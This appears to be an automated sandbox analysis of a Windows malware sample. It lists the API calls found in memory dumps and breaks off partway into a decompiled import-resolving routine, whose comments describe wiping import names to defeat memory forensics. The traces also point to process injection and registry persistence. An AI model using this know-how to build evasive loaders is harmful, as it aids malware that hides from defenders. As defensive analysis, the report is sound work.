  • Instruction Fuzzy Hash: 5d65c5167d05eb071b61c740fb2aa7fd16767ced16d889d5a98f858644bbd093
APIs
  • RtlImageNtHeader.NTDLL ref: 001C1A48
  • GetCurrentThreadId.KERNEL32 ref: 001C1A5E
  • GetCurrentThread.KERNEL32 ref: 001C1A6F
    • Part of subcall function 001DBD3F: memcpy.NTDLL(?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 001DBE6D
    • Part of subcall function 001DBD3F: memcpy.NTDLL(?,?,00000018,?,?,?,?,?,?,?,?,?,00000000), ref: 001DBEBC
    • Part of subcall function 001DBD3F: memcpy.NTDLL(?,001DC9CF,00000800,?,?,00000000), ref: 001DBF2C
    • Part of subcall function 001DBD3F: NtUnmapViewOfSection.NTDLL(000000FF,00000000), ref: 001DBF67
    • Part of subcall function 001DBD3F: RtlNtStatusToDosError.NTDLL(00000000), ref: 001DBF6E
    • Part of subcall function 001DBD3F: CloseHandle.KERNEL32(00000000), ref: 001DBF7D
    • Part of subcall function 001DBD3F: memset.NTDLL ref: 001DBF91
    • Part of subcall function 001D7471: GetCurrentThreadId.KERNEL32(?,?,?,?,?,?,001C11C5,000004D2), ref: 001D74A9
    • Part of subcall function 001D7471: GetSystemTimeAsFileTime.KERNEL32(?,?,?,?,?,?,?,001C11C5,000004D2), ref: 001D74B5
    • Part of subcall function 001D7471: GetTempFileNameA.KERNEL32(00000000,00000000,?,00000000), ref: 001D74C3
    • Part of subcall function 001D7471: lstrcpy.KERNEL32(00000000), ref: 001D74DE
    • Part of subcall function 001C1966: lstrlen.KERNEL32(?,00000001,?,?,?,00000001,?,?), ref: 001C19D1
    • Part of subcall function 001C1966: HeapFree.KERNEL32(00000000,00000000), ref: 001C19F9
  • HeapFree.KERNEL32(00000000,?,00000000), ref: 001C1AE3
  • HeapFree.KERNEL32(00000000,00000020,00000000), ref: 001C1AF3
  • RtlAllocateHeap.NTDLL(00000000,00000400), ref: 001C1B3F
  • wsprintfA.USER32 ref: 001C1B50
  • lstrlen.KERNEL32(00000000,00000000), ref: 001C1B5B
    • Part of subcall function 001CBD48: lstrlen.KERNEL32(?,00000000,?,?,?,?,?,?,001CD153,00000125,?,00000004,00000000), ref: 001CBD78
    • Part of subcall function 001CBD48: RtlAllocateHeap.NTDLL(00000000,?,00000000), ref: 001CBD8E
    • Part of subcall function 001CBD48: memcpy.NTDLL(00000010,?,00000000,?,?,?,?,001CD153), ref: 001CBDC4
    • Part of subcall function 001CBD48: memcpy.NTDLL(00000010,00000000,?), ref: 001CBDDF
    • Part of subcall function 001CBD48: CallNamedPipeA.KERNEL32(00000000,?,?,00000010,00000119,00000001), ref: 001CBDFD
    • Part of subcall function 001CBD48: GetLastError.KERNEL32 ref: 001CBE07
    • Part of subcall function 001CBD48: HeapFree.KERNEL32(00000000,00000000), ref: 001CBE2D
  • HeapFree.KERNEL32(00000000,00000000,0000010D), ref: 001C1B75
Strings
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 183
  • API ID: lstrcpy$CoInitializeExCoUninitializePathFindExtensionShellExecuteExlstrlenmemsetwsprintf
  • String ID: <
  • API String ID: 1457465641-4251816714
  • Opcode ID: 36c43c169b7f4adfcc7eed8db55d242cf47c4c2cff2d35238d5400cc3024a577
  • Instruction ID: 3de0f454e75166d7dc89cb568257ea8f04ae800c90f99e8cafab956dcc2645f6
  • Opcode Fuzzy Hash: 93F078708B2E8BC1CD9158C9160535692C06F30E68E9C9B137824F966B6B20312C9F9D
  • Instruction Fuzzy Hash: 3de0f454e75166d7dc89cb568257ea8f04ae800c90f99e8cafab956dcc2645f6
APIs
  • memset.NTDLL ref: 01B32CEE
  • CoInitializeEx.OLE32(00000000,00000002), ref: 01B32CF9
  • PathFindExtensionW.SHLWAPI(00000000), ref: 01B32D14
  • lstrcpyW.KERNEL32(00000000,01B38224), ref: 01B32D29
  • lstrlen.KERNEL32(01B37494,?,?,?,?,?,?,?,?,?,?,01B318D7,?), ref: 01B32D46
  • lstrcpyW.KERNEL32(00000000,01B384B8), ref: 01B32D77
    • Part of subcall function 01B3115C: RtlAllocateHeap.NTDLL(00000000,?,01B33CA0), ref: 01B31168
  • wsprintfW.USER32 ref: 01B32DAE
  • ShellExecuteExW.SHELL32(0000003C), ref: 01B32DE3
  • CoUninitialize.OLE32 ref: 01B32DF7
    • Part of subcall function 01B31171: HeapFree.KERNEL32(00000000,?,01B33D05), ref: 01B3117D
Strings
Memory Dump Source
  • Source File: 00000003.00000002.667099668.01B31000.00000020.sdmp, Offset: 01B31000, based on PE: false
Similarity
  • Total matches: 60
  • API ID: HeapFree$lstrlenmemcpy$RtlAllocateHeapSwitchToThreadlstrcpy
  • String ID:
  • API String ID: 732536130-0
  • Opcode ID: a427ae31280889244c8d76e620d9b5f9788be67866348582a82e8a58517c2dc5
  • Instruction ID: a2cec6491fe12f34e3abab1a275dd9d209e051195fd81796f6ed6d95fe43367f
  • Opcode Fuzzy Hash: 90116D11582D32C3D113B46AC1E8B7EFA45FF961D6C1F3001E9127510E4A935EF6AB6E
  • Instruction Fuzzy Hash: a2cec6491fe12f34e3abab1a275dd9d209e051195fd81796f6ed6d95fe43367f
APIs
    • Part of subcall function 001C3B4A: HeapFree.KERNEL32(00000000,?,?), ref: 001C3BCD
  • lstrlen.KERNEL32(?,?,?,00000001), ref: 001C216D
  • RtlAllocateHeap.NTDLL(00000000,?,?), ref: 001C218F
  • lstrcpy.KERNEL32(00000020,?), ref: 001C21AE
  • lstrlen.KERNEL32(?), ref: 001C21B8
  • memcpy.NTDLL(?,?,?), ref: 001C21F9
  • memcpy.NTDLL(?,?,?), ref: 001C220C
  • HeapFree.KERNEL32(00000000,00000000,00000000), ref: 001C224F
    • Part of subcall function 001CBD48: lstrlen.KERNEL32(?,00000000,?,?,?,?,?,?,001CD153,00000125,?,00000004,00000000), ref: 001CBD78
    • Part of subcall function 001CBD48: RtlAllocateHeap.NTDLL(00000000,?,00000000), ref: 001CBD8E
    • Part of subcall function 001CBD48: memcpy.NTDLL(00000010,?,00000000,?,?,?,?,001CD153), ref: 001CBDC4
    • Part of subcall function 001CBD48: memcpy.NTDLL(00000010,00000000,?), ref: 001CBDDF
    • Part of subcall function 001CBD48: CallNamedPipeA.KERNEL32(00000000,?,?,00000010,00000119,00000001), ref: 001CBDFD
    • Part of subcall function 001CBD48: GetLastError.KERNEL32 ref: 001CBE07
    • Part of subcall function 001CBD48: HeapFree.KERNEL32(00000000,00000000), ref: 001CBE2D
  • SwitchToThread.KERNEL32(?,00000000,?,?), ref: 001C2230
    • Part of subcall function 001C2B66: memset.NTDLL ref: 001C2BCA
    • Part of subcall function 001C2B66: CloseHandle.KERNEL32(?), ref: 001C2C13
    • Part of subcall function 001C2B66: HeapFree.KERNEL32(00000000,00000000,00000000), ref: 001C2DC7
    • Part of subcall function 001C2B66: GetLastError.KERNEL32(?,00000000,?), ref: 001C3013
  • HeapFree.KERNEL32(00000000,?,?), ref: 001C2275
  • HeapFree.KERNEL32(00000000,?,?), ref: 001C2291
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 62
  • API ID: CloseHandle$LocalFreeRtlDeleteCriticalSectionRtlEnterCriticalSectionRtlLeaveCriticalSectionSetEventSleepWaitForSingleObject
  • String ID:
  • API String ID: 1546928802-0
  • Opcode ID: 44cbb82d1bc8bc2d29e416fe044868003d437d2d6ba21b65bae40637e45a7bca
  • Instruction ID: 191c3ac2f4053567846d1cc33e924360c7a86817a4ea2a5247009256dd1e7f80
  • Opcode Fuzzy Hash: 18E02BA421196647D99708B00461B1FAE82BBE23E484C3303F552A25C2BB0712C4DF2A
  • Instruction Fuzzy Hash: 191c3ac2f4053567846d1cc33e924360c7a86817a4ea2a5247009256dd1e7f80
APIs
  • SetEvent.KERNEL32(?,001C1F1A,?,001EB068,?,00000000,001C13EB), ref: 001DB84C
    • Part of subcall function 001DAF5A: InterlockedExchange.KERNEL32(001C13EB,000000FF), ref: 001DAF61
  • WaitForSingleObject.KERNEL32(?,000000FF), ref: 001DB866
  • CloseHandle.KERNEL32(?), ref: 001DB86F
  • CloseHandle.KERNEL32(?), ref: 001DB87D
  • RtlEnterCriticalSection.NTDLL(00000008), ref: 001DB889
  • RtlLeaveCriticalSection.NTDLL(00000008), ref: 001DB8B2
  • Sleep.KERNEL32(000001F4), ref: 001DB8C1
  • CloseHandle.KERNEL32(?), ref: 001DB8CE
  • LocalFree.KERNEL32(?), ref: 001DB8DC
  • RtlDeleteCriticalSection.NTDLL(00000008), ref: 001DB8E6
    • Part of subcall function 001C12FF: HeapFree.KERNEL32(00000000,?,001DB8F2), ref: 001C130B
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 59
  • API ID: GetLastError$VirtualAlloc$RtlEnterCriticalSectionRtlLeaveCriticalSectionSwitchToThread
  • String ID:
  • API String ID: 2452875170-0
  • Opcode ID: f7250d7c747c6724e85bc87f4a1d164c9bcb3d791413c0bfd27e5859a3665385
  • Instruction ID: e9cda0ef1bba535e69377ecfbf93933b7da227d9232d932a7ffe86fd6aa33c96
  • Opcode Fuzzy Hash: F931CCA2419FC2A7D5936A400890BBAC5C3FB12FF6D6CA732B674A02C81FC5274D2F54
  • Instruction Fuzzy Hash: e9cda0ef1bba535e69377ecfbf93933b7da227d9232d932a7ffe86fd6aa33c96
APIs
  • VirtualAlloc.KERNEL32(00000000,00008000,00003000,00000004), ref: 001DB03B
  • VirtualAlloc.KERNEL32(00000000,00008000,00003000,00000004), ref: 001DB05A
  • GetLastError.KERNEL32 ref: 001DB20B
  • GetLastError.KERNEL32 ref: 001DB28D
  • SwitchToThread.KERNEL32(?,?,?,?), ref: 001DB2D2
    • Part of subcall function 001DAF5A: InterlockedExchange.KERNEL32(001C13EB,000000FF), ref: 001DAF61
  • GetLastError.KERNEL32 ref: 001DB308
  • GetLastError.KERNEL32 ref: 001DB317
  • RtlEnterCriticalSection.NTDLL(?), ref: 001DB327
  • RtlLeaveCriticalSection.NTDLL(?), ref: 001DB338
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 61
  • API ID: memcpy$RtlAllocateHeapmemset$HeapFreelstrcmpi
  • String ID:
  • API String ID: 2612869081-0
  • Opcode ID: c2dacee3140373e500c22aac8ec47d9c8ec65dfe813f0c9f26dc5badd2c4d201
  • Instruction ID: 2a6ed72f7be82828a989acab500aa79ad59f26800ec0c1f59594e6530e87086a
  • Opcode Fuzzy Hash: 4201C028044DC281C42710841061FF9A506EFD13B5C8CAB76DDA13F08B5D0273F53797
  • Instruction Fuzzy Hash: 2a6ed72f7be82828a989acab500aa79ad59f26800ec0c1f59594e6530e87086a
APIs
    • Part of subcall function 001C57CC: RtlEnterCriticalSection.NTDLL(001EB248), ref: 001C57D4
    • Part of subcall function 001C57CC: RtlLeaveCriticalSection.NTDLL(001EB248), ref: 001C57E9
    • Part of subcall function 001C57CC: InterlockedIncrement.KERNEL32(0000001C), ref: 001C5802
  • RtlAllocateHeap.NTDLL(00000000,00000018,001ED278), ref: 001CAC70
  • memset.NTDLL ref: 001CAC81
  • lstrcmpi.KERNEL32(?,?), ref: 001CACC1
  • RtlAllocateHeap.NTDLL(00000000,?), ref: 001CACEA
  • memcpy.NTDLL(00000000,?,?), ref: 001CACFE
  • memset.NTDLL ref: 001CAD0B
  • memcpy.NTDLL(?,?,?,?,00000000,?,00000000,?,?), ref: 001CAD24
  • memcpy.NTDLL(-00000005,001EC42B,00000007,?,?,?,?,00000000,?,00000000,?,?), ref: 001CAD3F
  • HeapFree.KERNEL32(00000000,?), ref: 001CAD5C
    • Part of subcall function 001C7AF2: RegCreateKeyA.ADVAPI32(80000001,00000000,?), ref: 001C7B06
    • Part of subcall function 001C7AF2: memcpy.NTDLL(00000000,001C7C21,?,?,00000008,?,001C7C21,00000000,00000000,?), ref: 001C7B2F
    • Part of subcall function 001C7AF2: RegCloseKey.ADVAPI32(?,?,001C7C21,00000000,00000000,?,?,?,?,?,?,?,?,00000008,001C77AB,00000000), ref: 001C7B81
    • Part of subcall function 001C5761: InterlockedDecrement.KERNEL32(0000001C), ref: 001C5765
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 61
  • API ID: RtlAllocateHeaplstrlen$HeapFree_wcsuprlstrcatlstrcpymemcpy
  • String ID:
  • API String ID: 1573093752-0
  • Opcode ID: f08ef74051028bad1df3046b05b27150d2409501bab8048f9561d94f45d3640f
  • Instruction ID: 49f792a003b958594b94fef63a2c1694da6c43edfde979eb277695decca324f2
  • Opcode Fuzzy Hash: F9F0FEB01D1901DB8023453EE06037DE502AC442E2B1C8617FD80B525F7F4372E0BF59
  • Instruction Fuzzy Hash: 49f792a003b958594b94fef63a2c1694da6c43edfde979eb277695decca324f2
APIs
  • lstrlenW.KERNEL32(00000000), ref: 001CB606
  • RtlAllocateHeap.NTDLL(00000000,001EAC82), ref: 001CB61C
  • memcpy.NTDLL(00000000,00000000,001EAC80), ref: 001CB62F
  • _wcsupr.NTDLL ref: 001CB63A
  • lstrlenW.KERNEL32(?,001EAC80), ref: 001CB66C
  • RtlAllocateHeap.NTDLL(00000000,?,001EAC80), ref: 001CB681
  • lstrcpyW.KERNEL32(00000000,?), ref: 001CB697
  • lstrcatW.KERNEL32(00000000,001EC940), ref: 001CB6B5
  • HeapFree.KERNEL32(00000000,00000000), ref: 001CB6C4
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 33
  • API ID: lstrlen$CloseHandleDeleteFileHeapFreeMapViewOfFileRtlAllocateHeapUnmapViewOfFilewcstombs
  • String ID:
  • API String ID: 3071814901-0
  • Opcode ID: d05e3ff4273796c9b17326ba3024fd4693d54f1ec967c9ade7a5abc202e65e4f
  • Instruction ID: 7e783e8648c44d89f659e24c24dcd4eaacf23487424efcd1c96aaf08dceaf5d1
  • Opcode Fuzzy Hash: 8DF08B71654AC2CBD22778A6A6517BBF901FB532C3C4E3732DC40251681F4232D22B1B
  • Instruction Fuzzy Hash: 7e783e8648c44d89f659e24c24dcd4eaacf23487424efcd1c96aaf08dceaf5d1
APIs
    • Part of subcall function 001C7262: memset.NTDLL ref: 001C7284
    • Part of subcall function 001C7262: lstrlenW.KERNEL32(?,?,?,?,?,?), ref: 001C72C8
    • Part of subcall function 001C7262: OpenFileMappingA.KERNEL32(80000000,00000000,?), ref: 001C730E
    • Part of subcall function 001C7262: CloseHandle.KERNEL32(?), ref: 001C7331
  • MapViewOfFile.KERNEL32(?,00000004,00000000,00000000,?,?,?,?), ref: 001C4D32
  • CloseHandle.KERNEL32(?), ref: 001C4D3E
  • lstrlenW.KERNEL32(00000000), ref: 001C4D58
  • RtlAllocateHeap.NTDLL(00000000,00000001), ref: 001C4D69
  • wcstombs.NTDLL ref: 001C4D7A
  • lstrlen.KERNEL32(?), ref: 001C4D87
    • Part of subcall function 001D9462: lstrlen.KERNEL32(-00000002,00000000,?,-00000002,-00000002,?,001C4D99), ref: 001D9472
    • Part of subcall function 001DDE6F: RtlAllocateHeap.NTDLL ref: 001DDEA1
    • Part of subcall function 001DDE6F: lstrcat.KERNEL32(00000000,001EC117), ref: 001DDF4F
    • Part of subcall function 001DDE6F: RtlAllocateHeap.NTDLL(00000000,00000800), ref: 001DDFC7
    • Part of subcall function 001DDE6F: StrTrimA.SHLWAPI(00000000,001E53C8), ref: 001DE039
    • Part of subcall function 001DDE6F: lstrcpy.KERNEL32(00000000,00000000), ref: 001DE061
    • Part of subcall function 001DDE6F: lstrcat.KERNEL32(00000000,?), ref: 001DE06F
    • Part of subcall function 001DDE6F: lstrcat.KERNEL32(00000000,00000000), ref: 001DE07F
    • Part of subcall function 001DDE6F: HeapFree.KERNEL32(00000000,?,?), ref: 001DE12C
    • Part of subcall function 001DDE6F: HeapFree.KERNEL32(00000000,?,001EB1C0), ref: 001DE176
    • Part of subcall function 001DDE6F: HeapFree.KERNEL32(00000000,00000000,001ED2CA), ref: 001DE185
    • Part of subcall function 001DDE6F: HeapFree.KERNEL32(00000000,?,?), ref: 001DE197
    • Part of subcall function 001DDE6F: HeapFree.KERNEL32(00000000,00000000), ref: 001DE1AD
    • Part of subcall function 001DDE6F: HeapFree.KERNEL32(00000000,?), ref: 001DE1BC
  • UnmapViewOfFile.KERNEL32(?,?,?,?,00000000,00000001), ref: 001C4DBC
  • HeapFree.KERNEL32(00000000,00000000), ref: 001C4DCE
  • DeleteFileW.KERNEL32(?), ref: 001C4DDC
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 49
  • API ID: GetTickCountHeapFreeRegCloseKeyRegCreateKeyRtlAllocateHeapRtlImageNtHeaderStrRChrlstrlenwsprintf
  • String ID:
  • API String ID: 473458267-0
  • Opcode ID: 21cd21af9a4aaeb0892998a3b8bf2ca0770d14e129f35d2f1317603fddf0a3d6
  • Instruction ID: 233c1588e08a29c017db756c2c3cc83d8e7a4f483530507245655a67d20bfa99
  • Opcode Fuzzy Hash: 82F05935850C435DC06788E5483AB3BE6417B002D8DDC6A33F9416D2066F8332969B6B
  • Instruction Fuzzy Hash: 233c1588e08a29c017db756c2c3cc83d8e7a4f483530507245655a67d20bfa99
APIs
  • RtlImageNtHeader.NTDLL(?), ref: 001C165E
  • RtlAllocateHeap.NTDLL(00000000,00000011), ref: 001C1685
  • GetTickCount.KERNEL32 ref: 001C169C
  • wsprintfA.USER32 ref: 001C16AC
  • RegCreateKeyA.ADVAPI32(80000001,001EC2F4,?), ref: 001C16E0
  • StrRChrA.SHLWAPI(00000000,00000000,00000000), ref: 001C16F8
  • lstrlen.KERNEL32(00000000), ref: 001C1702
  • RegCloseKey.ADVAPI32(?), ref: 001C171E
  • HeapFree.KERNEL32(00000000,00000000,00000000), ref: 001C172C
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 110
  • API ID: GetLastError$CancelIoCloseHandleCreateEventGetOverlappedResultReadFileWaitForMultipleObjectsWriteFile
  • String ID:
  • API String ID: 340323113-0
  • Opcode ID: c76374ab722defcc6b7910d2b5a917f55ad2d99158a8d4548ff4996c05cdb32e
  • Instruction ID: 4663223eb685f44cb7c3c2feaea3cf8fb5c10da6263795c37b1e1976f57e1679
  • Opcode Fuzzy Hash: B7E05C3D03050183442319B00225F9BAF186F662C7A8C33E2FE84CD6975B01BBE58152
  • Instruction Fuzzy Hash: 4663223eb685f44cb7c3c2feaea3cf8fb5c10da6263795c37b1e1976f57e1679
APIs
  • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,?,00000001,00000000,001CBA84,00000008,?,00000010,00000001,00000000,0000012B), ref: 001CB997
  • WriteFile.KERNEL32(?,00000001,?,?,?), ref: 001CB9CB
  • ReadFile.KERNEL32(?,00000001,?,?,?), ref: 001CB9D3
  • GetLastError.KERNEL32 ref: 001CB9DD
  • WaitForMultipleObjects.KERNEL32(00000002,00000000,00000000,00002710), ref: 001CB9F9
  • GetOverlappedResult.KERNEL32(?,?,?,00000000), ref: 001CBA12
  • CancelIo.KERNEL32(?), ref: 001CBA27
  • CloseHandle.KERNEL32(?), ref: 001CBA37
  • GetLastError.KERNEL32 ref: 001CBA3F
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 182
  • API ID: HeapFreePathFindFileNameRegCloseKeyRegOpenKeyExRegQueryValueExRtlAllocateHeapStrStrIlstrcmpilstrlen
  • String ID:
  • API String ID: 1756712956-0
  • Opcode ID: 7849c8b9b33a94634046e8246dea9d068437be0b98cf428e6df4f247afe7f281
  • Instruction ID: 18e037570c349af28e5fb9d2891916f9b52bff2a0339ffa6542edc82ff0ccd9b
  • Opcode Fuzzy Hash: F1F0278087CDC3C3CA49888A09653622058EFE2B45CBC9398B4803901C1FA03D6A2B8E
  • Instruction Fuzzy Hash: 18e037570c349af28e5fb9d2891916f9b52bff2a0339ffa6542edc82ff0ccd9b
APIs
  • PathFindFileNameW.SHLWAPI(01B3618C), ref: 01B31246
  • lstrcmpiW.KERNEL32(00000000,?,01B37494), ref: 01B3124D
  • RegOpenKeyExA.ADVAPI32(80000001,01B38080,00000000,00000000,?,?,01B37494), ref: 01B3127E
  • lstrlenW.KERNEL32(?,01B37494), ref: 01B31292
  • RtlAllocateHeap.NTDLL(00000000,?), ref: 01B312AA
  • RegQueryValueExW.ADVAPI32(?,00000000,01B37494,00000000,01B37494,?,01B37494), ref: 01B312C9
  • StrStrIW.SHLWAPI(00000000), ref: 01B312E4
  • HeapFree.KERNEL32(00000000,00000000), ref: 01B312F9
  • RegCloseKey.ADVAPI32(?,?,01B37494), ref: 01B31302
Memory Dump Source
  • Source File: 00000003.00000002.667099668.01B31000.00000020.sdmp, Offset: 01B31000, based on PE: false
Similarity
  • Total matches: 97
  • API ID: ResumeThread$GetLastErrorSuspendThreadWaitForSingleObjectmemset
  • String ID: d
  • API String ID: 307323562-2564639436
  • Opcode ID: 3424cbb1137d2442c81198497add0441f4db132d4a2ce8cb8b6f8920268ef235
  • Instruction ID: b8db2ac21e3ce66b9afee30e9f9d0f5fd3c10acb7799db9a356edd2bebb0603d
  • Opcode Fuzzy Hash: 76018E064AAA7143C6022C158545FBAF186EB03FB9C5CF710D560304CE0B4574E1F669
  • Instruction Fuzzy Hash: b8db2ac21e3ce66b9afee30e9f9d0f5fd3c10acb7799db9a356edd2bebb0603d
APIs
  • memset.NTDLL ref: 001DC393
    • Part of subcall function 001D8325: GetModuleHandleA.KERNEL32(001EC01D,?,?,?,?,001C13BC,00000000,001EB090,00000000,?,?), ref: 001D833F
    • Part of subcall function 001D8325: GetProcAddress.KERNEL32(00000000,001EDA66,?,?,?,?,001C13BC,00000000,001EB090,00000000,?,?), ref: 001D8350
    • Part of subcall function 001D8325: OpenProcess.KERNEL32(00000400,00000000,?,?,?,?,?,001C13BC,00000000,001EB090,00000000,?,?), ref: 001D836D
    • Part of subcall function 001D8325: IsWow64Process.KERNELBASE(00000000,?,?,?,?,?,001C13BC,00000000,001EB090,00000000,?,?), ref: 001D837E
    • Part of subcall function 001D8325: CloseHandle.KERNEL32(00000000), ref: 001D8391
    • Part of subcall function 001D90C0: RtlNtStatusToDosError.NTDLL(C0000002), ref: 001D90ED
    • Part of subcall function 001D90C0: SetLastError.KERNEL32(00000000,?,001DC3F5,00000000,?,00010007,00000004,?), ref: 001D90F4
  • ResumeThread.KERNEL32(?,00000000,?,?,00000000,?,00010007,00000004,?), ref: 001DC42A
  • WaitForSingleObject.KERNEL32(00000064), ref: 001DC438
  • SuspendThread.KERNEL32(?), ref: 001DC450
    • Part of subcall function 001D909F: RtlNtStatusToDosError.NTDLL(00000000), ref: 001D90B7
    • Part of subcall function 001DC212: memset.NTDLL ref: 001DC240
    • Part of subcall function 001DC212: ResumeThread.KERNEL32(?,?,00000004,00000004,?,?,?,?,?,00000004,?), ref: 001DC2CA
    • Part of subcall function 001DC212: WaitForSingleObject.KERNEL32(00000064), ref: 001DC2D8
    • Part of subcall function 001DC212: SuspendThread.KERNEL32(?), ref: 001DC2EB
    • Part of subcall function 001DBD3F: memcpy.NTDLL(?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 001DBE6D
    • Part of subcall function 001DBD3F: memcpy.NTDLL(?,?,00000018,?,?,?,?,?,?,?,?,?,00000000), ref: 001DBEBC
    • Part of subcall function 001DBD3F: memcpy.NTDLL(?,001DC9CF,00000800,?,?,00000000), ref: 001DBF2C
    • Part of subcall function 001DBD3F: NtUnmapViewOfSection.NTDLL(000000FF,00000000), ref: 001DBF67
    • Part of subcall function 001DBD3F: RtlNtStatusToDosError.NTDLL(00000000), ref: 001DBF6E
    • Part of subcall function 001DBD3F: CloseHandle.KERNEL32(00000000), ref: 001DBF7D
    • Part of subcall function 001DBD3F: memset.NTDLL ref: 001DBF91
  • GetLastError.KERNEL32(00000000,?,00010007,00000004,?), ref: 001DC4C5
  • ResumeThread.KERNEL32(00000004), ref: 001DC4D6
Strings
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 51
  • API ID: CreateFileGetLastErrorHeapFreeRegCloseKeyRegOpenKey
  • String ID: [FILE]$[FILE]
  • API String ID: 3351174444-3230400787
  • Opcode ID: 033c4394e70e99a6bf63e685e4473468f8b4c093a00da4e8f42c8e7bfe120adf
  • Instruction ID: 2fcb9902772c4c4d4bc9c17d65ab76f3f424010ff8a5c77d50f6198a202490f7
  • Opcode Fuzzy Hash: 85F0DD3A594EC3CFD423249020157BAC805FB412E2CAD2716EA807E1C16F8333192F17
  • Instruction Fuzzy Hash: 2fcb9902772c4c4d4bc9c17d65ab76f3f424010ff8a5c77d50f6198a202490f7
APIs
  • RegOpenKeyA.ADVAPI32(80000001,001EC2F4,?), ref: 001C39AA
    • Part of subcall function 001D9A9C: RegCloseKey.ADVAPI32(?,00000000), ref: 001D9B23
    • Part of subcall function 001D9EAA: lstrlenW.KERNEL32(00000000,00000000,00000000,.dll,001C2B1B,00000000,.dll,00000094,00001000,00000000,00000000,00001000), ref: 001D9EB8
    • Part of subcall function 001D9EAA: lstrlen.KERNEL32(DllRegisterServer), ref: 001D9EC6
    • Part of subcall function 001D9EAA: RtlAllocateHeap.NTDLL(00000000,00000022), ref: 001D9EDB
    • Part of subcall function 001D95E9: lstrlenW.KERNEL32(?,00000000,001EAC80,?,?,?,001C1784,00000000,?,001C17F3,?,?,?,?,00000000), ref: 001D95F5
    • Part of subcall function 001D95E9: memcpy.NTDLL(00000000,?,00000000,00000002,?,?,?,001C1784,00000000,?,001C17F3,?,?,?,?,00000000), ref: 001D961D
    • Part of subcall function 001D95E9: memset.NTDLL ref: 001D962F
    • Part of subcall function 001C28FD: RegOpenKeyA.ADVAPI32(80000001,001EC2F4,00000000), ref: 001C2917
    • Part of subcall function 001C28FD: lstrcmpiW.KERNEL32(00001000,00000000,00000000,00001000,00000000,00000000,?,?,?,001C2B34,00000000,00000001,.dll,00000094,00001000,00000000), ref: 001C294D
    • Part of subcall function 001C28FD: lstrlenW.KERNEL32(00000000,00000000,00001000,00000000,00000000,?,?,?,001C2B34,00000000,00000001,.dll,00000094,00001000,00000000,00000000), ref: 001C295A
    • Part of subcall function 001C28FD: RegCloseKey.ADVAPI32(00000000,?,?,?,001C2B34,00000000,00000001,.dll,00000094,00001000,00000000,00000000,00001000), ref: 001C29B0
  • CreateFileW.KERNEL32(00000000,80000000,00000000,00000000,00000003,00000080,00000000), ref: 001C3A90
  • GetLastError.KERNEL32 ref: 001C3A9B
  • HeapFree.KERNEL32(00000000,00000000), ref: 001C3AB0
  • RegCloseKey.ADVAPI32(?,?,?,?,?), ref: 001C3AC1
    • Part of subcall function 001C29BF: RtlAllocateHeap.NTDLL(00000000,00010000,00000000), ref: 001C29D8
    • Part of subcall function 001C29BF: CreateDirectoryW.KERNEL32(00000000,00000000,?,?,001C2A7A,00000000), ref: 001C2A06
    • Part of subcall function 001C29BF: lstrlenW.KERNEL32(00000000,?,?,001C2A7A,00000000), ref: 001C2A12
    • Part of subcall function 001C29BF: HeapFree.KERNEL32(00000000,00000000), ref: 001C2A2A
Strings
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 143
  • API ID: lstrlenmemset$GetProcAddressLoadLibrary
  • String ID: ~
  • API String ID: 3655391705-1707062198
  • Opcode ID: 193527b1eef174f7d3812915e618651906c6adafd0bce5f2d714c946695c6d1b
  • Instruction ID: 921aa9c309e3062a7c0ff89a2649ec636ea75a0e194a81e600035f3a1db56f11
  • Opcode Fuzzy Hash: A7F02E4D155F71CAE17D2005187BBAA70C3F39671BD25E9031552B31076991B3292FCC
  • Instruction Fuzzy Hash: 921aa9c309e3062a7c0ff89a2649ec636ea75a0e194a81e600035f3a1db56f11
C-Code - Quality: 100%
			/* Decompiler output as shown in the report; the comments are the editor's reading of its
			   structure. __edi is the base of a PE image mapped by the sample itself and _a4 points at
			   that image's IMAGE_NT_HEADERS (consistent with the RtlImageNtHeader calls elsewhere in
			   this dump). For a 32-bit PE, offset 0x80 from the NT headers is
			   OptionalHeader.DataDirectory[IMAGE_DIRECTORY_ENTRY_IMPORT].VirtualAddress and offset
			   0x50 is OptionalHeader.SizeOfImage. The routine resolves the image's imports by hand
			   (LoadLibraryA / GetProcAddress), writes each address into the IAT and zeroes every DLL
			   and function name string right after using it, so a memory dump taken after this has
			   run no longer contains readable import names. The return values 0x7e and 0x7f are the
			   Win32 error codes ERROR_MOD_NOT_FOUND and ERROR_PROC_NOT_FOUND. */
			E00401389(void* __edi, intOrPtr _a4) {
				_Unknown_base(*)()* _v4;
				intOrPtr _v8;
				struct HINSTANCE__* _v12;
				signed int _v16;
				intOrPtr _t23;
				struct HINSTANCE__* _t24;
				intOrPtr _t27;
				intOrPtr _t28;
				_Unknown_base(*)()* _t29;
				intOrPtr _t33;
				intOrPtr* _t34;
				intOrPtr _t35;
				void* _t42;
				CHAR* _t44;
				intOrPtr* _t46;
				CHAR* _t49;
				signed int* _t50;
				intOrPtr _t57;

				_t42 = __edi;                                  /* image base */
